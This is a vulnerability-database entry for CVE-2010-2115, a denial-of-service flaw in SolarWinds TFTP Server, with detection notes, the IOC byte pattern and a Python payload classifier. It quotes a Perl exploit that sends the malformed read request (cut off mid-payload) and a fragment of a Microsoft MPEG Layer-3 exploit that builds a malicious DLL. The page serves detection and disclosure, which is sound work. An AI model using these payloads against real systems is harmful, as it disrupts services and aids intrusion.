CVE-2010-2115
Published 2010-05-28
SolarWinds TFTP Server 10.4.0.10 allows remote attackers to cause a denial of service (no new connections) via a crafted read request.
Priority P3 · 41 · medium · 5 CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS 55.95% (98.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | tftp_server | — | — |
Detection & IOCs
Bytes:
\x00\x01\x01\x00NETASCII\x00
- Detect a TFTP Read Request (opcode 0x0001) over UDP port 69 where the filename field is a single byte (0x01) followed by a null byte and the mode string 'NETASCII'. This malformed request with a single-byte filename triggers the DoS condition.
- Alert on TFTP 'netascii' read requests containing a specially crafted (abnormally short/single-byte) filename field targeting SolarWinds TFTP Server 10.4.0.10; the server will stop accepting new connections without crashing.
- Affected version is specifically SolarWinds TFTP Server 10.4.0.10; scope of impact on other versions is not confirmed by available sources.
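The detection notes above, written as a payload check. This is an added example, not code from any of the page's sources: it parses a UDP payload as an RFC 1350 request and labels the listed byte pattern `exact`. The `suspicious` tier for other single-byte filenames, the function names and the sample payloads are assumptions constructed here.

```python
import struct

# UDP payloads constructed for this example; "ioc" is the byte pattern listed above.
SAMPLES = {
    "ioc": b"\x00\x01\x01\x00NETASCII\x00",
    "one_char": b"\x00\x01a\x00netascii\x00",
    "normal": b"\x00\x01startup-config\x00netascii\x00",
    "octet": b"\x00\x01\x01\x00octet\x00",
    "write": b"\x00\x02\x01\x00netascii\x00",
    "truncated": b"\x00\x01\x01",
}


def parse_request(payload):
    """Parse a TFTP RRQ/WRQ: 2-byte opcode, filename NUL, mode NUL.

    Returns (opcode, filename, lowercased mode), or None when the payload
    is not a complete read/write request.
    """
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (1, 2):
        return None
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:  # need filename, mode and the terminating NUL
        return None
    return opcode, fields[0], fields[1].lower()


def classify(payload, dport=69):
    """Return 'exact', 'suspicious' or 'clean' for one UDP payload."""
    req = parse_request(payload) if dport == 69 else None
    if req is None:
        return "clean"
    opcode, filename, mode = req
    if opcode != 1 or mode != b"netascii" or len(filename) != 1:
        return "clean"
    # 0x01 is the filename byte given on this page; any other single-byte
    # filename is only flagged for review (assumption, not confirmed above).
    return "exact" if filename == b"\x01" else "suspicious"


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:10} {classify(data)}")
```

The mode comparison is case-insensitive because RFC 1350 allows the mode string in any mix of case.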
No detection rules found.
Exploit-DB
Microsoft MPEG Layer-3 - Remote Command Execution
exploitdb·2010-09-05·CVSS 9.3
CVE-2010-0480 [CRITICAL] Microsoft MPEG Layer-3 - Remote Command Execution
---
fHTML = open('index.html', 'w')
fHTML.write(strHTML)
fHTML.close()
fdR = open('exploit.dll', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:1380]
str2 = strTotal[2115:]
Exploit-DB
SolarWinds TFTP Server 10.4.0.10 - Denial of Service
exploitdb·2010-05-21
CVE-2010-2115 SolarWinds TFTP Server 10.4.0.10 - Denial of Service
---
# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code :
#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k
use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NET
Metasploit
SolarWinds TFTP Server 10.4.0.10 Denial of Service
metasploit
The SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name.
No writeups or analysis indexed.